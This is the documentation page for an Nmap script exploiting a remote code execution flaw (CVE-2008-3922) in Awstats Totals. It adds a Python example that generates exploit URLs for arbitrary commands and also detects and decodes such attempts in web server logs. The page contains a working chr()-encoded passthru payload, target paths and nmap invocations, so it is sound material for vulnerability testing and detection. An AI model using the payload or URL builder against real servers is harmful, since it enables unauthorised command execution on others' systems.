Script http-awstatstotals-exec
Script types:
portrule
Categories:
vuln, intrusive, exploit
Download: https://svn.nmap.org/nmap/scripts/http-awstatstotals-exec.nse
Script Summary
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14, and possibly other products based on it (CVE-2008-3922).
The vulnerability is exploited through the GET variable sort.
The script queries the web server with the command payload encoded using PHP's
chr() function (the chr() chain below spells out "uname -a"; the trailing exit() stops the page after the command output so only that output is returned):
?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}
Common paths for Awstats Totals:
/awstats/index.php
/awstatstotals/index.php
/awstats/awstatstotals.php
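The payload construction above is mechanical enough to be worth seeing in code, and the same pattern is what a defender needs to spot in access logs. The following is an added example, not code from the Nmap project or the NSE script: it builds the sort= payload for an arbitrary command (reproducing the page's uname -a query byte for byte), expands it over the three common paths, and then does the reverse, pulling exploit attempts out of Apache/nginx combined-format log lines and decoding the chr() chain back into the command that was run. The sample log lines are constructed; the target hostname is a placeholder.

```python
import re
from urllib.parse import parse_qs

# Paths listed on the nsedoc page as common Awstats Totals locations.
COMMON_PATHS = (
    "/awstats/index.php",
    "/awstatstotals/index.php",
    "/awstats/awstatstotals.php",
)


def chr_encode(cmd: str) -> str:
    """Express a command as a PHP chr() concatenation: 'id' -> 'chr(105).chr(100)'.
    Only digits, dots and parentheses reach the URL, so the command itself
    needs no quoting or percent-encoding."""
    return ".".join(f"chr({ord(c)})" for c in cmd)


def build_query(cmd: str) -> str:
    """The ?sort= query exactly as the script sends it: passthru() runs the
    command inside a {${...}} expression, exit() then stops the page so only
    the command output comes back.  $, ( and ) are percent-encoded."""
    return "?sort={%24{passthru%28" + chr_encode(cmd) + "%29}}{%24{exit%28%29}}"


def candidate_urls(base_url: str, cmd: str, paths=COMMON_PATHS) -> list:
    """One exploit URL per common install path for a single host."""
    base = base_url.rstrip("/")
    return [base + path + build_query(cmd) for path in paths]


# --- detection / forensics side --------------------------------------------

# Combined log format: client, ident, user, [timestamp], "request line" ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)"')

# {${ func( ARG ) }} with a PHP command-execution function; ARG is captured.
INJECTION = re.compile(
    r"\{\$\{\s*(passthru|system|exec|shell_exec|popen|proc_open)\s*\((.*?)\)\s*\}\}",
    re.IGNORECASE | re.DOTALL,
)
CHR_CALL = re.compile(r"chr\((\d+)\)")


def recover_command(arg: str) -> str:
    """Turn a chr(117).chr(110)... argument back into text; anything else
    (e.g. a literal string) is returned unchanged for the analyst to read."""
    nums = CHR_CALL.findall(arg)
    if nums and CHR_CALL.sub("", arg).strip(".") == "":
        return "".join(chr(int(n)) for n in nums)
    return arg


def extract_command(request_line: str):
    """Return the injected command if the sort= parameter of the request line
    carries the CVE-2008-3922 pattern, else None."""
    parts = request_line.split()
    if len(parts) < 2 or "?" not in parts[1]:
        return None
    params = parse_qs(parts[1].split("?", 1)[1], keep_blank_values=True)
    for value in params.get("sort", []):  # parse_qs has already URL-decoded
        m = INJECTION.search(value)
        if m:
            return recover_command(m.group(2))
    return None


def scan_log(text: str) -> list:
    """(client_ip, command) for every exploit attempt found in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            cmd = extract_command(m.group(3))
            if cmd is not None:
                hits.append((m.group(1), cmd))
    return hits


# Constructed sample log (not real traffic): a benign sort, the page's own
# uname -a payload, and a benign multi-parameter request.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Apr/2002:09:53:27 +0200] "GET /awstats/index.php?sort=config HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Apr/2002:09:53:28 +0200] "GET /awstats/index.php?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}} HTTP/1.1" 200 78 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
203.0.113.9 - - [14/Apr/2002:10:01:00 +0200] "GET /awstatstotals/index.php?sort=hosts&order=desc HTTP/1.1" 200 4096 "-" "curl/7.19.7"
"""

if __name__ == "__main__":
    for url in candidate_urls("http://target.example", "uname -a"):
        print(url)
    for ip, cmd in scan_log(SAMPLE_LOG):
        print(f"exploit attempt from {ip}: {cmd!r}")
```

The detector URL-decodes before matching because the encoded form ({%24{ ... %28) varies with the client's choice of what to percent-encode, while the decoded {${passthru( shape does not; matching on the whole family of execution functions rather than passthru alone also catches variants of the public exploit that swap the function name.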
References:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
- http://www.exploit-db.com/exploits/17324/
Script Arguments
- http-awstatstotals-exec.uri
Awstats Totals URI including path. Default: /index.php
- http-awstatstotals-exec.cmd
Command to execute. Default: whoami
- http-awstatstotals-exec.outfile
Output file. If set it saves the output in this file.
Other useful arguments when running this script:
- http.useragent
User Agent to use in the GET request.
- slaxml.debug
See the documentation for the slaxml library.
- http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
See the documentation for the http library.
- smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
Example Usage
nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target>
nmap -sV --script http-awstatstotals-exec.nse <target>
Script Output
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-awstatstotals-exec.nse:
|_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
Requires
Author:
License: Same as Nmap--See https://nmap.org/book/man-legal.html
action (host, port)
MAIN
Parameters:
- host
- port